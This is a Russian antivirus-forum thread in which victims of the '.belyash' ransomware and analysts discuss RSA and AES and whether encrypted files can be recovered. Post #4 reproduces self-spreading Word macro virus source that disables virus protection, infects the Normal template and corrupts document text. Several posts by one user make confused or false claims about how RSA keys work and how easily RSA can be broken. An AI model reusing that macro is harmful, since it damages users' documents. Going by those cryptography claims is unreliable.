Перейти к содержимому


Фото
- - - - -

Обсуждение алгоритмов шифрования


  • Please log in to reply
17 ответов в этой теме

#1 QuarQ

QuarQ

    Newbie

  • Posters
  • 12 Сообщений:

Отправлено 04 Апрель 2012 - 15:42

вот теперь человеческий вопрос: зачем хелпер просит то что уже имеет , а также знает конечный диагноз ,
компостирует мозг!?

В какой-то подобной теме на этом форуме аналитик писал, что иногда удавалось расшифровать, используя то, что технокрыс допустил какие-то ошибки в своём поделии.
О сути ошибок естественно не писалось. ;)


мне клиент позвонит в течении недели о результатах , я предложу еще раз просканировать комп на наличие дубликатов а вось чтото нароюps хотя при RSA ... это нереально по причине того что сам фаил при кодировании превращается в функцию а ключ является множителем этой самой функции и любая ошибка приведет к полной потере информации , а также метод шифрования является односторонней функцией то есть если мы раскалываем орех то обратным действием мы его не соберем (но матиматики орут что таких функций нету , по скольку нету доказатества теоремы об такий самых функциях)

Прикрепленные файлы:



#2 siux

siux

    Newbie

  • Posters
  • 5 Сообщений:

Отправлено 04 Апрель 2012 - 18:50

По анализу моих побитых файлов (новое расширение .belyash, длина + 4 байта, вредоносное программное обеспечение 109.ехе) одинаковые 16-байтные строки исходника становятся одинаковыми же, причем в разных файлах. Есть значительное количество небитых копий пострадавших файлов. Если среди них подобрать строки из сплошных, например, нулей и строки с одним-двумя ненулевыми байтами в разных позициях строки и сравнить с зашифрованными, то, вероятно, можно много выяснить об алгоритме кодирования?


А что вам даст алгоритм кодирования? Ну скажу я что там AES и дальше что? Даже потратив уйму сил и времени на лично ваш ключ, эта информация будет бесполезна всем остальным.

Я в этих вопросах полное Newbie. Уж извините.
И в самом деле -- можно ли по свойствам закодированного фрагмента файла понять, чем это так бедолагу покорежили?
Ведь что, в сущности, можно сделать с битом, не разрушив информацию? Могу представить себе только изменение по однозначно обратимому правилу и перемещение на другое место внутри фрагмента. Это вроде бы линейные операции и при всего лишь 16-байтной длине строки и большом выборе таких строк можно набрать разрешаемую за приемлемое время систему уравнений.
Натурально, это не есть универсальный метод взлома AES или RSA, а всего лишь лазейка для некоторых жертв belyasha и копать ее придется самостоятельно -- по своим файлам, своими часами машинного времени. Думаю, добровольцы нашлись бы -- знать бы только правильную методику.

#3 QuarQ

QuarQ

    Newbie

  • Posters
  • 12 Сообщений:

Отправлено 04 Апрель 2012 - 18:55

По анализу моих побитых файлов (новое расширение .belyash, длина + 4 байта, вредоносное программное обеспечение 109.ехе) одинаковые 16-байтные строки исходника становятся одинаковыми же, причем в разных файлах. Есть значительное количество небитых копий пострадавших файлов. Если среди них подобрать строки из сплошных, например, нулей и строки с одним-двумя ненулевыми байтами в разных позициях строки и сравнить с зашифрованными, то, вероятно, можно много выяснить об алгоритме кодирования?


однозначный ответ нет нельзя ! при этом анализе можно только найти код которым шифруют , а нужен код которым дешефруют это совсем разыне ключи и способы воздействия на фаил !
прочтите внимательно мой предыдущий пост (лучше несколько раз) молотком склеить орех неполучиться! но разбить можно именно этот молоток вы и найдете а вам нужен клей и сколько на молоток не смотри это не подскажет какой клей нужен .

есть только один маленький нюанс, я его уже описывал в предыдущих постах ключ для декодирования создаеться на основе НЕИСПОЛЬЗУЕМЫХ МНОЖЕТЕЛЯХ ключа кодера это позволяет отбросить около полу процента вариантов что на конечный результат рассшифровки ни как не повлияет
rsa 1024 устарел еще 2007 году кагда миру представили его приемника rsa 2048 который по качесву превосходит в 10 раз а по расшифровке уходит кудато в даль в геометрической прогрессии при чем приныепы щифрования несиметричным ключом остаются незыблемыми шифруется одим способом , расшифровываеться совершенно другим
конец обзаца

#4 Ivan16

Ivan16

    Newbie

  • Members
  • 1 Сообщений:

Отправлено 04 Апрель 2012 - 22:29

У меня тож проблемы с этим гадским вирусом, я тут нашёл чё то в нете мож поможет чемто, Всем привет ..я сейчас служу в армии, но там в штабе тоже есть
комп...Так что спешу всех порадовать...
Конечно интересно лазить по СМЕРЧам , но какой же я реактивщик
...я просто пользователь ПК....

public varAD as boolean
public varnt as boolean

sub autoopen()
'belyash
if 1=1 then
call max
end if
end sub

sub max ()
dim mx1 as integer
dim mx2 as integer
dim k as integer
dim i as integer
varnt=true
varad=true
i=0
k=0
mx1=0
mx2=0
on error resume next
option.virusprotection=(1-1)
option.confirmconversions=0
option.savenormalprompt=false
set ad=activedocument.vbproect.vbcomponents
set nt=normaltemplate.vbproect.vbcomponents
for i= 0 to ad.count
if ad.item("belyash").name<>"belyash" then
ad(i).codemodule.deletelines 1, ad(i).codemodule.coutoflines
nt("belyash").export word.application.path & "\belyash.max"
ad.import word.application.path & "\belyash.max"
end if
next i

for k=0 to nt.count
if nt.item("belyash").name<>"belyash" then


nt(k).codemodule.deletelines 1, nt(k).codemodule.coutoflines
w=w+1
else
varnt=false
end if
next k
if w>=1 and varnt=true then
ad("belyash").export word.application.path & "\belyash.max"
nt.import word.application.path & "\belyash.max"
end if
end sub


sub document_close()

selection.find.clearformatting
selection.find.replacement.clearformatting
with selection.find
.text=", "
.replaement=" бля "
.forward=true
.wrap=wdFindcontinue.format=false
.matchcase=false
.matchwholeword=false
.matchwildcards=false
.matchsoundslike=false
.matchallwordforms=false
end withselection.find.execute
selection.find.execute replace:=wdreplaceall
if activedocument.saved=false then activedocument.save
end sub



Питання ..пропозиции
Что -то антивирь молчит ...Мож и не макровирь это

я в этом не шарю может что-то про вирус!

#5 mrbelyash

mrbelyash

    Беляш

  • Helpers
  • 25 897 Сообщений:

Отправлено 05 Апрель 2012 - 00:36

Не лепи горбатого. Это со старого форума САЛД

wiki https://drw.sh/endjcv | Утилиты https://drw.sh/dgweku | Лечить удаленно https://drw.sh/wmzdcl | Скрытые процессы https://drw.sh/tmulje | Логи https://drw.sh/ruy | Песочница https://drw.sh/exhbro


#6 QuarQ

QuarQ

    Newbie

  • Posters
  • 12 Сообщений:

Отправлено 05 Апрель 2012 - 11:57

хотите еще немного теории шифрования по RSA ?
допустим у нас есть открытый ключ "50927, 11"(реальный это тот что лежит на рабочем столе)
и мы этим ключем хотим зашифровать число "1234"  это будет выглядеть так
нам потребуется посчитать значение 1234 в степени 11 mod 50927
10103381606301936187653160695875584 Это всего лишь 11-я степень, а в настоящей криптографии : 1024 степень
после чего мы модим это число с помощью ключа и получаем зашифрованное число "49136"
то есть было 1234 на выходе 49136
в дополнение могу сказать только  все расчеты реальные
все именно так и есть и если кто хочет проверит получит  теже результаты
ключ для расшифровки выглядит вот так "50927, 27491" (я имею ввиду для нашего примера, а не в случае с беляшом :) )

Сообщение было изменено QuarQ: 05 Апрель 2012 - 11:58


#7 siux

siux

    Newbie

  • Posters
  • 5 Сообщений:

Отправлено 06 Апрель 2012 - 10:30

Спасибо QuarQ'у за пример (#98)! А то самое понятное попавшееся мне описание -- в Википедии, но и от него в основном суеверный ужас
.....
допустим у нас есть открытый ключ "50927, 11"(реальный это тот что лежит на рабочем столе)
и мы этим ключем хотим зашифровать число "1234" это будет выглядеть так
нам потребуется посчитать значение 1234 в степени 11 mod 50927
10103381606301936187653160695875584 Это всего лишь 11-я степень, а в настоящей криптографии : 1024 степень
после чего мы модим это число с помощью ключа и получаем зашифрованное число "49136"
то есть было 1234 на выходе 49136
....
Можно ли трактовать это так, что длина строки после шифровки RSA не обязательно совпадает с длиной исходной?
И еще: какие примерно затраты времени на мегабайт при шифровке RSA?

#8 QuarQ

QuarQ

    Newbie

  • Posters
  • 12 Сообщений:

Отправлено 06 Апрель 2012 - 11:49

могу сказать проще и доступнее (научно популярно) на тех же самых принципах основана электронная подпись майкрасофта ,за всю историю их использования не было ни одного случая взлома (воровство подписей мы не рассматриваем) а попыток куча .
в сети есть кластерные сообщества (платные бесплатные) это такая куча компов предоставляющих свои ресурсы для общего дела, так вот ода из таких систем приплачивая своим членам создала довольно таки мощную (по их заявлениям )сеть и заявляют что к концу следующего года будут способны сломать код RSA за 10 минут (как я понимаю тупым перебором)
и даже при этом
во первых : ни кто не разрешит этого делать (это чисто академический вопрос)
во вторых их компьютерное время платное (которое и распределяется между много миллионными членами данного кластера)
"не обязательно совпадает с длиной исходной? " скажу по другому ни как не зависит от первоначального размера
суть шифрования заключается : преобразовать до неузнаваемости без возможности сделать обратное действие
самый простой пример найдите квадратный корень из числа 2, а потом сделайте обратное действие возведите полученный результат во вторую степень вот по этому существует ключ который способен это число посредством другой функции вернуть первоначальное значение числу

#9 siux

siux

    Newbie

  • Posters
  • 5 Сообщений:

Отправлено 06 Апрель 2012 - 14:03

Спасибо.
Второй вопрос теряет актуальность. Смысл у обоих вопросов был один -- убедиться, что файлы непосредственно методом RSA не шифровались.
Получается, нужно сосредоточиться на AES -- он то обращаемый.

#10 v.martyanov

v.martyanov

    Guru

  • Virus Analysts
  • 8 308 Сообщений:

Отправлено 06 Апрель 2012 - 14:05

Спасибо.
Второй вопрос теряет актуальность. Смысл у обоих вопросов был один -- убедиться, что файлы непосредственно методом RSA не шифровались.
Получается, нужно сосредоточиться на AES -- он то обращаемый.


Нет смысла. 2^256 вариантов перебрать и расшифровать файлы только одному человеку. Сколько это миллиардов комбинаций?

Личный сайт по Энкодерам - http://vmartyanov.ru/


#11 siux

siux

    Newbie

  • Posters
  • 5 Сообщений:

Отправлено 06 Апрель 2012 - 20:19

Ну, насчет 256 я сумлеваюсь. В покоцанных у меня файлах совпадают 16-байтные строки, соответствующие совпадающим исходным.
Если бы при шифровании использовались только линейные операции, достаточно было бы подобрать небольшое (равное количеству раундов) линейно независимых "исходных" строк, чтобы вычислить "раундные ключи". А ключи эти, похоже, были одинаковыми все время злодейства.
Вот только обратные байты в поле GF... Хорошо бы пообщаться с математиком, которого а+а=0 ("простейшее свойство сложения" в этом поле) не повергает в шизофрению.

#12 siux

siux

    Newbie

  • Posters
  • 5 Сообщений:

Отправлено 06 Апрель 2012 - 20:24

А что касается "пользы для обчества", то удачный алгоритм вычисления ключей помог бы многим, у кого уцелели копии некоторых зашифрованных файлов.

#13 lala19

lala19

    Newbie

  • Posters
  • 8 Сообщений:

Отправлено 07 Апрель 2012 - 10:56

можно ли надеяться что фото хотя бы удастся восстановить!!!???

#14 #user

#user

    Member

  • Posters
  • 406 Сообщений:

Отправлено 07 Апрель 2012 - 11:18

можно ли надеяться что фото хотя бы удастся восстановить!!!???

http://forum.drweb.com/index.php?showtopic=308160&view=findpost&p=593051

#15 lala19

lala19

    Newbie

  • Posters
  • 8 Сообщений:

Отправлено 07 Апрель 2012 - 14:21

можно ли надеяться что фото хотя бы удастся восстановить!!!???

http://forum.drweb.com/index.php?showtopic=308160&view=findpost&p=593051

7????????????????????????????????

#16 SergM

SergM

    Guru

  • Moderators
  • 9 387 Сообщений:

Отправлено 07 Апрель 2012 - 14:24

lala19, Перевожу вопрос: Вам аналитик ответил?

#17 v.martyanov

v.martyanov

    Guru

  • Virus Analysts
  • 8 308 Сообщений:

Отправлено 09 Апрель 2012 - 10:14

Ну, насчет 256 я сумлеваюсь. В покоцанных у меня файлах совпадают 16-байтные строки, соответствующие совпадающим исходным.
Если бы при шифровании использовались только линейные операции, достаточно было бы подобрать небольшое (равное количеству раундов) линейно независимых "исходных" строк, чтобы вычислить "раундные ключи". А ключи эти, похоже, были одинаковыми все время злодейства.
Вот только обратные байты в поле GF... Хорошо бы пообщаться с математиком, которого а+а=0 ("простейшее свойство сложения" в этом поле) не повергает в шизофрению.


Факт остается фактом: длина ключа для AES - 256 бит в данном случае, при этом длина блока - 128 бит.

Личный сайт по Энкодерам - http://vmartyanov.ru/


#18 lala19

lala19

    Newbie

  • Posters
  • 8 Сообщений:

Отправлено 11 Апрель 2012 - 14:20

есть новости,кому то удалось восстановить фото???


Читают тему: 0

0 пользователей, 0 гостей, 0 скрытых